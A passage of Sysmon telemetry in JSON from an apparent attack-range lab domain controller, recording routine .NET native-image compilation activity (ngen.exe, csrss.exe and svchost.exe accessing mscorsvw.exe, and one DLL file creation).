gen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7458,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:27.371\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0489-5F25-0000-0010CD760D00}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:27.371","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0489-5F25-0000-0010CD760D00}","TargetProcessId":"756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7459,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:27.387\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04BF-5F25-0000-00109F591000}\r\nTargetProcessId: 756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:27.387","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04BF-5F25-0000-00109F591000}","TargetProcessId":"756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7460,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:27.450\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04BF-5F25-0000-00101D5D1000}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:27.450","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04BF-5F25-0000-00101D5D1000}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7461,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:27.450\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04BF-5F25-0000-00101D5D1000}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:27.450","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04BF-5F25-0000-00101D5D1000}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:27","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7462,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:27.465\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04BF-5F25-0000-00101D5D1000}\r\nTargetProcessId: 4748\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:27.465","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04BF-5F25-0000-00101D5D1000}","TargetProcessId":"4748","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7463,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:28.450\r\nProcessGuid: {A837DB8D-04BF-5F25-0000-00101D5D1000}\r\nProcessId: 4748\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\128c-0\\System.Deployment.dll\r\nCreationUtcTime: 2020-08-01 05:59:28.450","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:28.450","ProcessGuid":"{A837DB8D-04BF-5F25-0000-00101D5D1000}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\128c-0\\System.Deployment.dll","CreationUtcTime":"2020-08-01 05:59:28.450","EventReceivedTime":"2020-08-01 05:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7464,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:28.512\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04C0-5F25-0000-00104B611000}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:28.512","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-04C0-5F25-0000-00104B611000}","TargetProcessId":"1436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7465,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:28.512\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-04C0-5F25-0000-00104B611000}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:28.512","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-04C0-5F25-0000-00104B611000}","TargetProcessId":"1436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:28","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7466,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:28.528\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-04C0-5F25-0000-00104B611000}\r\nTargetProcessId: 1436\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:28.528","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-04C0-5F25-0000-00104B611000}","TargetProcessId":"1436","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:29","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
